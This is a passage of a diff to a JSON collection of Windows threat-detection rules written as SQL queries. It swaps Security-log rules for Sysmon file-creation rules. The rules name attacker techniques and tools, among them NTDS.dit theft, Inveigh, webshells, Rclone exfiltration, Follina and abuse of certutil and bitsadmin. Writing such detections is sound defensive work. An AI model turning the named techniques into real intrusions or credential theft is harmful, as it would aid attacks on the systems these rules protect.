= 'SeLoadDriverPrivilege' AND Service = '-') AND NOT (((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Dism.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\fltMC.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\HelpPane.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\mmc.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wimserv.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\RuntimeBroker.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')) OR ((ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procmon64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procmon.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Local\\\\Microsoft\\\\Windows\\\\SchCache\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.sch' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\mmc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceSvc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\ccmsetup\\\\autoupgrade\\\\ccmsetup%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\SentinelOne\\\\Sentinel Agent%' ESCAPE '\\')) OR (Image LIKE '%\\\\LANDesk\\\\LDCLient\\\\ldapwhoami.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\system32\\\\efsui.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\')) OR (Image LIKE '%:\\\\Program Files\\\\Citrix\\\\Receiver StoreFront\\\\Services\\\\DefaultDomainServices\\\\Citrix.DeliveryServices.DomainServices.ServiceHost.exe' ESCAPE '\\')))" ], - "filename": "win_security_user_driver_loaded.yml" + "filename": "file_event_win_susp_adsi_cache_usage.yml" }, { - "title": "Persistence and Execution at Scale via GPO Scheduled Task", - "id": "a8f29a7b-b137-4446-80a0-b804272f3da2", + "title": "Suspicious NTDS.DIT Creation", + "id": "4e7050dd-e548-483f-b7d6-527ab4fa784d", "status": "test", - "description": "Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale", - "author": "Samir Bousseaden", + "description": "Detects suspicious creations of a file named \"ntds.dit\" (Active Directory Database) by suspicious parent process, directory or a suspicious one liner", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.lateral_movement", - "attack.t1053.005" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ - "If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\SYSVOL' ESCAPE '\\' AND RelativeTargetName LIKE '%ScheduledTasks.xml' ESCAPE '\\' AND (Accesses LIKE '%WriteData%' ESCAPE '\\' OR Accesses LIKE '%\\%\\%4417%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND ((ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\apache%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_gpo_scheduledtasks.yml" + "filename": "file_event_win_ntds_dit.yml" }, { - "title": "Hacktool Ruler", - "id": "24549159-ac1b-479c-8175-d42aea947cae", - "status": "test", - "description": "This events that are generated when using the hacktool Ruler by Sensepost", - "author": "Florian Roth (Nextron Systems)", + "title": "Inveigh Execution Artefacts", + "id": "bb09dd3e-2b78-4819-8e35-a7c1b874e449", + "status": "experimental", + "description": "Detects the presence and execution of Inveigh via dropped artefacts", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1087", - "attack.t1114", - "attack.t1059", - "attack.t1550.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Go utilities that use staaldraad awesome NTLM library" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4776' AND Workstation = 'RULER') OR (EventID IN ('4624', '4625') AND WorkstationName = 'RULER')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\Inveigh-Log.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Cleartext.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-FormInput.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Relay.ps1' ESCAPE '\\'))" ], - "filename": "win_security_alert_ruler.yml" + "filename": "file_event_win_hktl_inveigh_artefacts.yml" }, { - "title": "SMB Create Remote File Admin Share", - "id": "b210394c-ba12-4f89-9117-44a2464b9511", - "status": "test", - "description": "Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).", - "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", + "title": "EVTX Created In Uncommon Location", + "id": "65236ec7-ace0-4f0c-82fd-737b04fd4dcb", + "status": "experimental", + "description": "Detects the creation of new files with the \".evtx\" extension in non-common locations. Which could indicate tampering with default evtx locations in order to evade security controls", + "author": "D3F7A5105", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Unknown" + "Admin activity", + "Backup activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '%C$' ESCAPE '\\' AND AccessMask = '0x2') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%.evtx' ESCAPE '\\' AND NOT ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Containers\\\\BaseImages\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\dllhost.exe' ESCAPE '\\'))))" ], - "filename": "win_security_smb_file_creation_admin_shares.yml" + "filename": "file_event_win_create_evtx_non_common_locations.yml" }, { - "title": "NetNTLM Downgrade Attack", - "id": "d3abac66-f11c-4ed0-8acb-50cc29c97eed", - "status": "test", - "description": "Detects NetNTLM downgrade attack", - "author": "Florian Roth (Nextron Systems), wagga", + "title": "File Creation In Suspicious Directory By Msdt.EXE", + "id": "318557a5-150c-4c8d-b70e-a9910e199857", + "status": "experimental", + "description": "Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities", + "author": "Vadim Varganov, Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" + "attack.persistence", + "attack.t1547.001", + "cve.2022.30190" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4657' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%ControlSet%' ESCAPE '\\' AND ObjectName LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND ObjectValueName IN ('LmCompatibilityLevel', 'NtlmMinClientSec', 'RestrictSendingNTLMTraffic'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "win_security_net_ntlm_downgrade.yml" + "filename": "file_event_win_msdt_susp_directories.yml" }, { - "title": "Active Directory Replication from Non Machine Account", - "id": "17d619c1-e020-4347-957e-1d1207455c93", + "title": "Windows Webshell Creation", + "id": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", "status": "test", - "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Possible webshell file creation on a static web site", + "author": "Beyu Denis, oscd.community, Tim Shelton", "tags": [ - "attack.credential_access", - "attack.t1003.006" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "Unknown" + "Legitimate administrator or developer creating legitimate executable files in a web application folder" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND AccessMask = '0x100' AND (Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.asp%' ESCAPE '\\' OR TargetFilename LIKE '%.ashx%' ESCAPE '\\' OR TargetFilename LIKE '%.ph%' ESCAPE '\\')) OR ((TargetFilename LIKE '%\\\\www\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\htdocs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\html\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.ph%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (Image = 'System') OR (TargetFilename LIKE '%\\\\xampp%' ESCAPE '\\')))" ], - "filename": "win_security_ad_replication_non_machine_account.yml" + "filename": "file_event_win_webshell_creation_detect.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - Security", - "id": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Rclone Config File Creation", + "id": "34986307-b7f4-49be-92f3-e7a4d01ac5db", + "status": "test", + "description": "Detects Rclone config file being created", + "author": "Aaron Greetham (@beardofbinary) - NCC Group", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate Rclone usage (rare)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ServiceFileName LIKE '%value%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%comspec%' ESCAPE '\\' OR ServiceFileName LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\.config\\\\rclone\\\\%' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_via_use_rundll32_services_security.yml" + "filename": "file_event_win_rclone_exec_file.yml" }, { - "title": "WCE wceaux.dll Access", - "id": "1de68c67-af5c-4097-9c85-fe5578e09e67", + "title": "Wmiprvse Wbemcomn DLL Hijack - File", + "id": "614a7e17-5643-4d89-b6fe-f9df1a79641c", "status": "test", - "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", - "author": "Thomas Patzke", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.s0005" + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4658', '4660', '4663') AND ObjectName LIKE '%\\\\wceaux.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image = 'System' AND TargetFilename LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" ], - "filename": "win_security_mal_wceaux_dll.yml" + "filename": "file_event_win_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "HybridConnectionManager Service Installation", - "id": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", + "title": "Suspicious PFX File Creation", + "id": "dca1b3e8-e043-4ec8-85d7-867f334b5724", "status": "test", - "description": "Rule to detect the Hybrid Connection Manager service installation.", + "description": "A general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file.", "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.persistence", - "attack.t1554" + "attack.credential_access", + "attack.t1552.004" ], "falsepositives": [ - "Legitimate use of Hybrid Connection Manager via Azure function apps." + "System administrators managing certififcates." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'HybridConnectionManager' AND ServiceFileName LIKE '%HybridConnectionManager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%.pfx' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%\\\\Templates\\\\Windows\\\\Windows\\_TemporaryKey.pfx%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\CMake\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_hybridconnectionmgr_svc_installation.yml" + "filename": "file_event_win_susp_pfx_file_creation.yml" }, { - "title": "Possible Shadow Credentials Added", - "id": "f598ea0c-c25a-4f72-a219-50c44411c791", + "title": "Creation In User Word Startup Folder", + "id": "a10a2c40-2c4d-49f8-b557-1a946bc55d9d", "status": "experimental", - "description": "Detects possible addition of shadow credentials to an active directory object.", - "author": "Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", + "description": "Detects the creation of an file in user Word Startup", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1556" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. (From elastic FP section)" + "Addition of legitimate plugins" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-KeyCredentialLink')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Word\\\\STARTUP\\\\%' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotx' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.docb' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.wll' ESCAPE '\\' OR TargetFilename LIKE '%.wwl' ESCAPE '\\')))" ], - "filename": "win_security_susp_possible_shadow_credentials_added.yml" + "filename": "file_event_win_office_winword_startup.yml" }, { - "title": "Password Change on Directory Service Restore Mode (DSRM) Account", - "id": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", - "status": "stable", - "description": "The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence.", - "author": "Thomas Patzke", + "title": "Suspicious Word Cab File Write CVE-2021-40444", + "id": "60c0a111-787a-4e8a-9262-ee485f3ef9d5", + "status": "experimental", + "description": "Detects file creation patterns noticeable during the exploitation of CVE-2021-40444", + "author": "Florian Roth (Nextron Systems), Sittikorn S", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.resource_development", + "attack.t1587" ], "falsepositives": [ - "Initial installation of a domain controller" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4794')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\INetCache%' ESCAPE '\\') OR (Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.inf%' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%AppData\\\\Local\\\\Temp%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Content.inf' ESCAPE '\\'))" ], - "filename": "win_security_susp_dsrm_password_change.yml" + "filename": "file_event_win_winword_cve_2021_40444.yml" }, { - "title": "Sysmon Channel Reference Deletion", - "id": "18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", + "title": "Hijack Legit RDP Session to Move Laterally", + "id": "52753ea4-b3a0-4365-910d-36cff487b789", "status": "test", - "description": "Potential threat actor tampering with Sysmon manifest and eventually disabling it", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND ObjectValueName = 'Enabled' AND NewValue = '0') OR (EventID = '4663' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND AccessMask = '65536')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')" ], - "filename": "win_security_sysmon_channel_reference_deletion.yml" + "filename": "file_event_win_tsclient_filewrite_startup.yml" }, { - "title": "Operation Wocao Activity - Security", - "id": "74ad4314-482e-4c3e-b237-3f7ed3b9ca8d", - "status": "test", - "description": "Detects activity mentioned in Operation Wocao report", - "author": "Florian Roth (Nextron Systems), frack113", + "title": "Created Files by Office Applications", + "id": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4", + "status": "experimental", + "description": "This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice.", + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", "tags": [ - "attack.discovery", - "attack.t1012", - "attack.defense_evasion", - "attack.t1036.004", - "attack.t1027", - "attack.execution", - "attack.t1053.005", - "attack.t1059.001" + "attack.t1204.002", + "attack.execution" ], "falsepositives": [ - "Administrators that use checkadmin.exe tool to enumerate local administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4799' AND TargetUserName LIKE 'Administr%' ESCAPE '\\' AND CallerProcessName LIKE '%\\\\checkadmin.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.proj' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\WebServiceCache\\\\AllUsers%' ESCAPE '\\' AND TargetFilename LIKE '%.com' ESCAPE '\\') OR (Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\webexdelta\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\assembly\\\\tmp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')))" ], - "filename": "win_security_apt_wocao.yml" + "filename": "file_event_win_script_creation_by_office_using_file_ext.yml" }, { - "title": "Suspicious Scheduled Task Update", - "id": "614cf376-6651-47c4-9dcc-6b9527f749f4", + "title": "Office Macro File Creation From Suspicious Process", + "id": "b1c50487-1967-4315-a026-6491686d860e", "status": "experimental", - "description": "Detects update to a scheduled task event that contain suspicious keywords.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a office macro file from a a suspicious process", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1053.005" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4702' AND (TaskContentNew LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContentNew LIKE '%regsvr32%' ESCAPE '\\' OR TaskContentNew LIKE '%rundll32%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd%' ESCAPE '\\' OR TaskContentNew LIKE '%/c %' ESCAPE '\\' OR TaskContentNew LIKE '%/k %' ESCAPE '\\' OR TaskContentNew LIKE '%/r %' ESCAPE '\\' OR TaskContentNew LIKE '%powershell%' ESCAPE '\\' OR TaskContentNew LIKE '%pwsh%' ESCAPE '\\' OR TaskContentNew LIKE '%mshta%' ESCAPE '\\' OR TaskContentNew LIKE '%wscript%' ESCAPE '\\' OR TaskContentNew LIKE '%cscript%' ESCAPE '\\' OR TaskContentNew LIKE '%certutil%' ESCAPE '\\' OR TaskContentNew LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContentNew LIKE '%bash.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%bash %' ESCAPE '\\' OR TaskContentNew LIKE '%scrcons%' ESCAPE '\\' OR TaskContentNew LIKE '%wmic %' ESCAPE '\\' OR TaskContentNew LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%forfiles%' ESCAPE '\\' OR TaskContentNew LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContentNew LIKE '%hh.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE 